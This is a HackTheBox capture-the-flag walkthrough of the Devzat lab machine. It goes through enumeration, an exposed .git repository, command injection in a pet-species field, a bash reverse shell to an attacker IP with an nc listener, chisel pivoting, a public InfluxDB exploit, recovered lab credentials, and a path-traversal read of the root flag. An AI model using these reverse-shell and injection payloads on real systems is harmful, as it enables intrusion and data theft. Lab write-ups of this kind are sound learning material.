Devzat - HackTheBox Walkthrough


CONTENTS:

  1. Connecting to the HTB machine
  2. Nmap scanning
  3. Adding the host to /etc/hosts
  4. ffuf scanning
  5. Git source code enumeration
  6. Using Wireshark
  7. Getting a reverse shell
  8. Using Burp Suite
  9. Pivoting
  10. InfluxDB exploitation
  11. Switching to catherine
  12. Root flag captured

1. CONNECTING TO HTB [via VPN]:

First of all, we need to connect to the HTB machine using the VPN profile downloaded from HTB.
My VPN profile: lab_dracula2001.ovpn
Command: openvpn lab_dracula2001.ovpn [command used to connect to the VPN]

Machine IP 10.10.11.118


2. Nmap Scanning [ for open ports]:

Nmap is used to scan for open ports.
Command: nmap -sC -sV -A -Pn 10.10.11.118


Nmap scan result: ports 22, 80 and 8000 are open. An Apache service is running on port 80, so we know there is a website to look at.

3. Adding the host to /etc/hosts:

The hostname devzat.htb must be added to our hosts file, otherwise we can't view the website.
Command: nano /etc/hosts [this file maps hostnames to IP addresses]


After adding the hosts entry, we are able to view the website.


Gobuster scanning:

I tried a gobuster scan and didn't get any result, so let's just move on to vhost scanning using ffuf.
Command: gobuster dir -u http://10.10.11.118:8000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium [gobuster dir -u (URL of website) -w (wordlist)]


4. ffuf scanning:

Command: ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc 200 -c -u http://devzat.htb/ -H "Host: FUZZ.devzat.htb"
The scan reveals the vhost pets.devzat.htb, which also needs to be added to /etc/hosts.


Scanning the web directories of pets.devzat.htb:
Command: ffuf -u http://pets.devzat.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -fs 510

5. Git source code enumeration:

The directory scan reveals an exposed .git directory, which we download recursively.
Command: wget -r -np -R "index.html" http://pets.devzat.htb/.git
wget saves the download in a directory named pets.devzat.htb.


After downloading, change into that directory and check the state of the repository with git status:


Many files show as deleted in the working tree, so we need to restore them.
Command used to restore: git restore .


Now let's go through the file called main.go.
Command: cat main.go [command used to view the content of the file]

[Screenshots: contents of main.go]

Reading the file shows that the website pets.devzat.htb is vulnerable to command injection: the species value is passed unsanitized into a command [command injection is possible via species].
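As an added defensive example (not code from the pets application or from the box), here is how a Go handler can take a species value safely: validate it against an allowlist and hand it to the helper as a single argv element instead of interpolating it into a shell string. The helper command (echo), the allowlist contents and the length limit are assumptions for the example.

```go
package main

import (
	"context"
	"errors"
	"os/exec"
	"regexp"
	"strings"
	"time"
)

// Only short lowercase names pass; ';', '|', '$', backticks and newlines are rejected.
var speciesPattern = regexp.MustCompile(`^[a-z]{1,20}$`)

// Explicit allowlist of accepted values (constructed for this example).
var allowedSpecies = map[string]bool{"cat": true, "dog": true, "gopher": true}

// ValidateSpecies rejects anything that is malformed or not on the allowlist.
func ValidateSpecies(s string) error {
	if !speciesPattern.MatchString(s) {
		return errors.New("species: malformed value")
	}
	if !allowedSpecies[s] {
		return errors.New("species: not in allowlist")
	}
	return nil
}

// SpeciesArgv builds the argv: the user value is one argument, never part of a "sh -c" string.
// echo stands in for whatever helper the real application would call (assumption).
func SpeciesArgv(species string) ([]string, error) {
	if err := ValidateSpecies(species); err != nil {
		return nil, err
	}
	return []string{"echo", "species:", species}, nil
}

// SpeciesInfo runs the helper directly (no shell involved) with a timeout.
func SpeciesInfo(species string) (string, error) {
	argv, err := SpeciesArgv(species)
	if err != nil {
		return "", err
	}
	ctx, cancel := context.WithTimeout(context.Background(), 2*time.Second)
	defer cancel()
	out, err := exec.CommandContext(ctx, argv[0], argv[1:]...).Output()
	if err != nil {
		return "", err
	}
	return strings.TrimSpace(string(out)), nil
}
```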

6. Using Wireshark :

Wireshark confirms the vulnerability: the ICMP echo requests triggered by the injected command are captured on our machine.

[Screenshot: Wireshark capture of ICMP echo requests]

7. Getting reverse shell :

To get a reverse shell, we first encode the payload with the following command.
Command: echo -n 'bash -i >& /dev/tcp/10.10.14.84/9001 0>&1' | base64

8. Using Burpsuite:

Now we use Burp Suite to intercept the web request.

To intercept the request, set "Intercept is on" under the Proxy tab in Burp Suite, then enable the browser proxy and submit the form on the website.

The intercepted request appears in Burp; place the payload in the species field as shown below:

[Screenshot: intercepted request with the payload in the species field]

After adding the payload, start the listener before forwarding the request.
Command: nc -lnvp 9001


We now have reverse shell access. After getting the shell, check which user we are running as:
Command: id

9. Pivoting :

Here we use chisel to forward ports back to the attacker's machine. chisel is downloaded from GitHub to our machine and then transferred to Devzat using a Python HTTP server.

[Screenshots: chisel server started on the attacker's machine]

Chisel on the Devzat machine:

[Screenshot: chisel client started on Devzat]

After port forwarding, we run an nmap scan against the forwarded port.

Command: nmap -p 8086 -sV 127.0.0.1

10. InfluxDB exploitation:

The scan shows an InfluxDB service running on port 8086, so we search for known exploits for it.

GitHub URL of the exploit: https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933

Command: git clone https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933

Download it, make it executable and install its requirements.

Command: chmod +x __main__.py
pip install -r requirements.txt

After these steps, start the InfluxDB exploit.

Command: python3 __main__.py


List the measurements (tables) with:

Command: SHOW MEASUREMENTS

Then dump the user measurement:

Command: select * from "user"

[Screenshot: contents of the user measurement]

User: catherine
Password: woBeeYareedahc7Oogeephies7Aiseci

We now have catherine's password, so we can switch to that user.

11. Switching to the catherine user:

Command: su catherine

Command: cat user.txt [to view the user flag]

User flag: [shown in screenshot]

In catherine's home directory we find two zip files, devzat-dev.zip and devzat-main.zip, which we copy to /tmp and unzip there.

Command: cp devzat-dev.zip /tmp

Comparing the two versions with diff shows that the "dev" build implements a file-reading function (the file command) protected by a password. The "dev" instance listens on localhost port 8443, which is why the process on 8443 could not be seen during the initial enumeration from the patrick account.

Command: diff dev/commands.go main/commands.go

[Screenshot: diff output between dev/commands.go and main/commands.go]

Now we download chisel again as the catherine user for port forwarding.

After downloading, make the chisel binary executable.

Command: chmod +x chisel_1.7.3_linux_amd64

Now we forward port 8443 from here to our own machine using chisel as before; the dev instance is an SSH service on that port.

[Screenshot: chisel client forwarding port 8443]

Command: ssh -l test 127.0.0.1 -p 8443

12. Root flag capturing:

Inside the dev chat, the password-protected file command reads the root flag:

Command: /file ../root.txt CeilingCatStillAThingin2021?

Finally, the system is PWNED!!